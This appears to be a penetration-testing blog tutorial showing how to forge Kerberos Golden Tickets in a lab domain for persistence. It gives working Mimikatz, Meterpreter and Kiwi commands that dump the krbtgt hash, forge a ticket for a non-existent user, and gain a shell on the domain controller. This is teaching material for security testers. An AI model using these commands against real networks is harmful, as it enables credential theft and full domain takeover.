Network penetration tests usually stop when domain administrator access has been obtained by the consultant. However domain persistence might be necessary if there is  project time to spent and there is a concern that access might be lost due to a variety of reasons such as:

  • Change of compromised Domain Admin Password
  • Detection of new domain administrator account

Benjamin Delpy discovered the Golden Ticket attack and since then various articles have been written around this topic and threat actors (Bronze Butler) are using this attack for domain persistence. This technique leverages the lack of validation on the Kerberos authentication protocol in order to impersonate a particular user valid or invalid. This is due to the fact that users that have a TGT (ticket granting ticket) in their current session will consider trusted for Kerberos and therefore can access any resource in the network.

Mimikatz support the creation of a golden ticket and its meterpreter extension kiwi. Metasploit Framework has a post exploitation module which can automate the activity. The creation of a golden ticket requires the following information:

  • Domain Name
  • Domain SID
  • Username to impersonate
  • krbtgt NTLM hash

Discovery of Golden Ticket Prerequisites

The Domain name and the domain SID can be obtained very easily by executing the whoami /user command or with the use of PsGetsid utility from PsTools.

whoami /user
PsGetsid64.exe pentestlab.local
Domain SID

Domain SID

The NTLM hash of the krbtgt account can be obtained via the following methods: 

  1. DCSync (Mimikatz)
  2. LSA (Mimikatz)
  3. Hashdump (Meterpreter)
  4. NTDS.DIT
  5. DCSync (Kiwi)

The DCSync is a mimikatz feature which will try to impersonate a domain controller and request account password information from the targeted domain controller. This technique is less noisy as it doesn’t require direct access to the domain controller or retrieving the NTDS.DIT file over the network.

lsadump::dcsync /user:krbtgt
Mimikatz - krbtgt NTLM Hash

Mimikatz – krbtgt NTLM Hash

Alternatively Mimikatz can retrieve the hash of the krbtgt account from the Local Security Authority (LSA) by executing Mimikatz on the domain controller.

privilege::debug
lsadump::lsa /inject /name:krbtgt
Mimikatz - krbtgt NTLM Hash via LSA Dump

Mimikatz – krbtgt NTLM Hash via LSA Dump

If there is a Meterpreter session with the domain controller the quickest method is the hashdump command:

Meterpreter - krbtgt NTLM Hash

Meterpreter – krbtgt NTLM Hash

The Kiwi extension also supports the DCSync method and can retrieve the SID, LM and NTLM hashes.

dcsync_ntlm krbtgt
Metasploit Kiwi DCSync - Retrieve the NTLM Hash

Metasploit Kiwi DCSync – Retrieve the NTLM Hash

Mimikatz

A forged Golden ticket can be created with Mimikatz by using the obtained information.

kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e
/ticket:evil.tck /ptt
Mimikatz - Golden Ticket Creation

Mimikatz – Golden Ticket Creation

The kerberos::list command will retrieve all the available Kerberos tickets and the kerberos::tgt will list the ticket that has been submitted for the current user session.

kerberos::list
kerberos::tgt
Mimikatz - Kerberos Tickets

Mimikatz – Kerberos Tickets

Since the ticket was generated with NTLM hash of the krbtgt account Kerberos will trust the ticket by default and therefore any user valid or invalid regardless of their privileges have unrestricted network access including access to the domain controller. This can be confirmed by listing the admin share on the domain controller.

dir \\WIN-PTELU2U07KG\C$
Golden Ticket - Executing Commands on the Domain Controller as standard user

Golden Ticket – Executing Commands on the Domain Controller as standard user

Attempts to list the same share as user test without the Golden Ticket will fail.

Run a Command on the DC before Golden Ticket

Listing DC Admin Share without Golden Ticket

Shell access to the domain controller is also possible with the use of the PsExec utility. Kerberos will grant access by using the ticket in the current session even though that the user ‘evil’ is not valid.

PsExec64.exe \\WIN-PTELU2U07KG\ cmd.exe 
Golden Ticket - Shell with PsExec as invalid user

Golden Ticket – Shell with PsExec as invalid user

Examining the list of domain users on the domain controller it is visible that the user evil doesn’t exist however he has domain administrator access.

Domain Users - Absence of evil user

Domain Users – Absence of evil user

It should be noted that the netbios name should be used for Kerberos authentication. Attempts to access the same resources with their correspondence IP addresses will fail with an access denied error since in this case NTLM authentication would be used and not the ticket.

Metasploit

In the scenario that domain administrator access has been obtained on the network and Metasploit Framework is used heavily in the assessment there is a Metasploit module which can automate the task of golden ticket.

post/windows/escalate/golden_ticket

The module will try to obtain the required data automatically however since the information has been already retrieved it can be imported manually.

Metasploit - Golden Ticket Module Configuration

Metasploit – Golden Ticket Module Configuration

Metasploit will create, store and apply the ticket automatically to an existing Meterpreter session.

Metasploit - Golden Ticket

Metasploit – Golden Ticket

Kiwi

Mimikatz has been ported to Metasploit Framework as an extension called kiwi. From a Meterpreter session Kiwi can be loaded by running the following:

meterpreter > load kiwi

The Golden Ticket can be created with kiwi by executing the following command:

golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307
-k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck 
Metasploit Kiwi - Golden Ticket

Metasploit Kiwi – Golden Ticket

In order to apply the ticket to the existing session the kerberos_ticket_use needs to be used:

kerberos_ticket_use /root/Downloads/pentestlabuser.tck

Verification that there is a Kerberos ticket for the current session

kerberos_ticket_list
Metasploit Kiwi - List of Kerberos Tickets

Metasploit Kiwi – List of Kerberos Tickets

Resources can be accessed on the domain controller as pentestlabuser which is an account that doesn’t exist.

Advertisements